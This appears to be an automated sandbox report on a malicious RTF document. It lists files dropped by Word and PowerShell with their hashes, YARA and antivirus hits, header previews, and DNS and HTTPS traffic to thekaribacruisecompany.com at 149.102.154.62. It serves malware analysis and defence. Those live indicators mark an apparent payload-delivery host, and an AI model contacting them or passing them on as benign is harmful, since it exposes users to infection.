                                                          SHA1:A44727652E6C84A1268945AA2F454F5424503411
                                                          SHA-256:CB7E80F94168D4C8F267255567F7232FAAAA3062D743C2375C3B7ECAD1F9718C
                                                          SHA-512:E13CBD0DE56639628266C18A34CB8F60052B588719F44F4EBC700D0D22BFF8AED74DD576A36737C131F4CD44E819AD074A50E7CF74994B313CE402F3E5349D2D
                                                          Malicious:false
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033{\fonttbl{\f0\froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f35\fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\f36\fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Verdana;}{\f264\froman\fcharset238\fprq2 Times New Roman CE;}{\f265\froman\fcharset204\fprq2 Times New Roman Cyr;}{\f267\froman\fcharset161\fprq2 Times New Roman Greek;}..{\f268\froman\fcharset162\fprq2 Times New Roman Tur;}{\f269\fbidi \froman\fcharset177\fprq2 Times New Roman (Hebrew);}{\f270\fbidi \froman\fcharset178\fprq2 Times New Roman (Arabic);}{\f271\froman\fcharset186\fprq2 Times New Roman Baltic;}..{\f272\froman\fcharset163\fprq2 Times New Roman (Vietnamese);}{\f614\fswiss\fcharset238\fprq2 Tahoma CE;}{\f615\fswiss\fcharset204\fprq2 Tahoma Cyr;}{\f617\fswiss\fcharset161\fprq2 Tahoma Greek;}{\f618\fswiss\fcharset162\fprq2 Tahoma Tur;}..{\f619\fbid
                                                          Process:C:\Users\user\AppData\Roaming\file.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):289916
                                                          Entropy (8bit):7.020613805726218
                                                          Encrypted:false
                                                          SSDEEP:6144:zG2oSPADA0jxUN/4f3fW5Vfj0HyfC/nmZAgzoG:zGfDA0aNgPKVfj0UCeRR
                                                          MD5:73B129D4ADDF747733B355ABC2B1FEB3
                                                          SHA1:5721A84833ED7C601C569EC0AEA4D7C318F1D5EF
                                                          SHA-256:A906A2CD26285F34F1E66D51CEB807231DAC9F2E38E683EC210D5D8BF8DE155D
                                                          SHA-512:FBAC79148FD8E66DEEC4A5BC643F3750F3716093E23535D3E754FB634E05DD888FE63D33C8DFBEF64EFB5802DD3551659626F7FE2642CCBB5EAB493ECC49CE46
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\file.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):42672
                                                          Entropy (8bit):5.9123418499114395
                                                          Encrypted:false
                                                          SSDEEP:768:bbGiXey9Kx/7yErMNHtxB3ptmL3zQYs+gAcckh/:bblh9KBNrMNHt33ptmL3TsVAW
                                                          MD5:77EF5801EA5C5BD331B83B813A741DDB
                                                          SHA1:71E010937EE6EBFB40C9F26EDE4C4F972B1DE5B6
                                                          SHA-256:D8CEDD5AF29E3539D7A48CEE62022D17F660627D32004B133F30D94F88432853
                                                          SHA-512:0FBD91DBD747BCA751F21821369929B6AA42C446DD1A1C1A1F794FE380E27F1A431DA1A794942DEF6FF1B43F791071BD5F1BF4259C32C401444014A318050C22
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8...k...k...k..lk...k0..j...k0..j...k0..j...k0..j...k...j...k...k..k...j...k...j...k...k...k..hk...k...j...kRich...k........PE..d......`.........." .....P...<.......R....................................................`.........................................`x..t....x..................................L....j..p...........................Pk..8............`...............................text....O.......P.................. ..`.rdata..Z#...`...$...T..............@..@.data................x..............@....pdata...............z..............@..@.rsrc...............................@..@.reloc..L...........................@..B................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Roaming\file.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):166947
                                                          Entropy (8bit):6.232611855964163
                                                          Encrypted:false
                                                          SSDEEP:3072:RROFUi/2PM0FQGxtMXG7aWTsHHAz9pjluR6xpRc8koGJG2R818X0BH8X1:mOvFQxWaTAz9qR6xNGJvz0BHM1
                                                          MD5:A06929ADEAD968870A2E6952CB7A0BD4
                                                          SHA1:CE8A3D0077CDB123ADECE62E4777BD0738E272EB
                                                          SHA-256:36B82AE3414F0941AED79604A17AB33994D3C0E868AA3DDAFD3B05F206BD4131
                                                          SHA-512:A6FD18D5996D92EF0A4C1BB3609BEF05F9F9E1044448E227B903292FE0B5773A89C8A02DE5CF2E1F560B176243B84BDF73353974FD66D710E1D36E31A5A10DFB
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........b........&"...%.....^......P.........D.....................................hL....`... ......................................p...........'........... ..................................................(....................................................text...............................`..`.data... ...........................@....rdata...l.......n..................@..@.pdata....... ......................@..@.xdata.......@......................@..@.bss.........`...........................edata.......p......................@..@.idata...'.......(...0..............@....CRT....X............X..............@....tls.................Z..............@....rsrc................\..............@....reloc...............`..............@..B................................................................................................................................
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                          Category:dropped
                                                          Size (bytes):676320
                                                          Entropy (8bit):7.876330435838718
                                                          Encrypted:false
                                                          SSDEEP:12288:8mNV/R3qdeJpAQxZg2ZE0PU4vPDC+0BOh8ybWIJQ3P0tX8glVk+4uWFG49:8mNV/RadXcvZ72PGX8g0uWA49
                                                          MD5:A1AFEF77EEC567ADB1076E8679AF207B
                                                          SHA1:842A3650C51486F329A4079CA4B62AE5542A8C98
                                                          SHA-256:2219616AFA29DD45A0B8926C8D840C5168F3B9E14A14F7569EA70EA8F5ACAA79
                                                          SHA-512:8DAFDDABA28D56F80B09545068A9A292A0D6E8C21D1D8CA0395B3AA113C467C4134A1781D62D78BA541AECF519DADA47F46D39EB59BF41B3B9366A3659027253
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: SUSP_NullSoftInst_Combo_Oct20_1, Description: Detects suspicious NullSoft Installer combination with common Copyright strings, Source: C:\Users\user\AppData\Roaming\file.exe, Author: Florian Roth (Nextron Systems)
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 6%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L.....Oa.................f....... ...3............@..................................)....@.................................D........p..H............9..@............................................................................................text....e.......f.................. ..`.rdata...............j..............@..@.data...8............~..............@....ndata...@...0...........................rsrc...H....p......................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):162
                                                          Entropy (8bit):2.503835550707525
                                                          Encrypted:false
                                                          SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
                                                          MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
                                                          SHA1:23684CCAA587C442181A92E722E15A685B2407B1
                                                          SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
                                                          SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
                                                          Malicious:false
                                                          Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
                                                          File type:Unicode text, UTF-8 text, with very long lines (4154), with CRLF line terminators
                                                          Entropy (8bit):3.2054554743535415
                                                          TrID:
                                                          • Rich Text Format (5005/1) 55.56%
                                                          • Rich Text Format (4004/1) 44.44%
                                                          File name:TEPO0015922.doc
                                                          File size:248144
                                                          MD5:364dc6c0e8a18b796aa535516d04cb53
                                                          SHA1:da1e74c37691d9fd57eb2e73ef89b3aacbaa23d2
                                                          SHA256:dd6f2ad2370d52c77db8f3659c116f15c1897e2528694fe9f046be45928a2608
                                                          SHA512:f2efd5cb38e6474c83268e7454e268eee06f342cb5b55575a94a3cd206bf7096a8a4ca72a89f88e35668d8d4e39243ef5c2f097f438dd7a7c09716c2d4c3a1c0
                                                          SSDEEP:1536:i1iO8Lcs5Kpn0Ws/zhiordTpM6DiJW3BPLN4rZVzFz76mAg5eeVhMDw5wfL8:i+5xdXGVzFtr5RDAw5wfY
                                                          TLSH:C7342EA4654F4872E208AC5DA4D47141AEB6FED330C598B123AFF031DF55AF2AEC019B
                                                          File Content Preview:{\rtf\Fbidi \froman\fcharset238\ud1\adeff31507\deff0\stshfdbch31506\stshfloch31506\ztahffick41c05\fnhsfBi58207\deEflAng1045\deEglangfe1045\themelang1045\themelangfe1\themelangcs5{\lsdlockedexcept \lsdqformat2 \lsdpriority0 \lsdlocked0 Normal;\b865c6673647
                                                          Icon Hash:e4eea2aaa4b4b4a4
                                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                          Mar 18, 2023 05:35:09.609759092 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.609777927 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.610021114 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.610275030 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.610409021 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.610429049 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.610429049 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.610455990 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.610553026 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.610553026 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.610868931 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.611001015 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.611136913 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.611136913 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.611160994 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.611284971 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.611387968 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.611470938 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.611557961 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.611638069 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.611654997 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.611707926 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.611742973 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.612143993 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.642641068 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.642848969 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.642885923 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.642918110 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.643048048 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.643048048 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.643198013 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.643323898 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.643379927 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.643404007 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.643449068 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.643449068 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.646737099 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.646872044 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.647243023 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.647243023 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.647291899 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.647330999 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.647382021 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.647398949 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.647532940 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.647733927 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.647733927 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.647733927 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.647758007 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.647792101 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.647834063 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.647852898 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.647893906 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.647893906 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.647942066 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.648056984 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.648289919 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.648416042 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.648435116 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.648456097 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.648483992 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.648519993 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.648741007 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.648914099 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.648999929 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.648999929 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.648999929 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.649020910 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.649110079 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.649182081 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.649318933 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.649354935 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.649561882 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.649760008 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.649885893 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.649920940 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.649945974 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.649997950 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.649997950 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.650162935 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.650296926 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.650357962 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.650435925 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.650633097 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.650758982 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.650830030 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.651048899 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.651067972 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.651084900 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.651159048 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.651160955 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.651159048 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.651187897 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.651252031 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.651252031 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.651437998 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.651520967 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.651659966 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.651675940 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.651875973 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.662184954 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.678879976 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.679044008 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.679059982 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.679095984 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.679171085 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.679171085 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.679428101 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.679542065 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.679621935 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.679863930 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.679908991 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.680037022 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.680097103 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.680118084 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.680162907 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.680195093 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.680408955 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.686235905 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.686422110 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.686464071 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.686489105 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.686533928 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.686533928 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.686748028 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.686842918 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.686876059 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.686989069 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.687200069 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.687289000 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.687408924 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.687422991 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.687464952 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.687526941 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.687526941 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.687712908 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.687824011 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.687836885 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.687860012 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.688198090 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.688198090 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.688198090 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.688244104 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.688363075 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.688431978 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.688749075 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.688771009 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.688791037 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.688846111 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.688846111 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.688875914 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.688985109 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.689143896 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.689227104 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.689227104 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.689282894 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.689404964 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.689675093 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.689800024 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.689852953 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.689868927 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.689924002 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.689924002 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.690186024 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.690293074 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.690303087 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.690318108 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.690371990 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.690404892 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.690577984 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.690710068 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.690710068 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.690746069 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.690939903 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.691107035 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.691210032 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.691210032 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.691210032 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.691248894 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.691328049 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.691929102 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.732139111 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.732284069 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.732598066 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.732605934 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.732598066 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.732655048 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.732778072 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.732778072 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.732815981 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.733001947 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.733001947 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.733078957 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.733216047 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.733282089 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.733302116 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.733330011 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.733380079 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.733561993 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.733566046 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.733566046 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.733757973 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.733916998 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.736059904 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.736094952 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:11.556562901 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:11.556624889 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:11.556727886 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:11.566462040 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:11.566510916 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:11.655685902 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:11.655949116 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:11.670600891 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:11.670623064 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:11.671432972 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:11.878767967 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:11.878922939 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:11.908595085 CET49172443192.168.2.22149.102.154.62
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 18, 2023 05:35:09.025356054 CET | 55868 | 53 | 192.168.2.22 | 8.8.8.8
Mar 18, 2023 05:35:09.050968885 CET | 53 | 55868 | 8.8.8.8 | 192.168.2.22
Mar 18, 2023 05:35:11.517184019 CET | 49688 | 53 | 192.168.2.22 | 8.8.8.8
Mar 18, 2023 05:35:11.542437077 CET | 53 | 49688 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 18, 2023 05:35:09.025356054 CET | 192.168.2.22 | 8.8.8.8 | 0x478c | Standard query (0) | thekaribacruisecompany.com | A (IP address) | IN (0x0001) | false
Mar 18, 2023 05:35:11.517184019 CET | 192.168.2.22 | 8.8.8.8 | 0x78e0 | Standard query (0) | thekaribacruisecompany.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 18, 2023 05:35:09.050968885 CET | 8.8.8.8 | 192.168.2.22 | 0x478c | No error (0) | thekaribacruisecompany.com |  | 149.102.154.62 | A (IP address) | IN (0x0001) | false
Mar 18, 2023 05:35:11.542437077 CET | 8.8.8.8 | 192.168.2.22 | 0x78e0 | No error (0) | thekaribacruisecompany.com |  | 149.102.154.62 | A (IP address) | IN (0x0001) | false
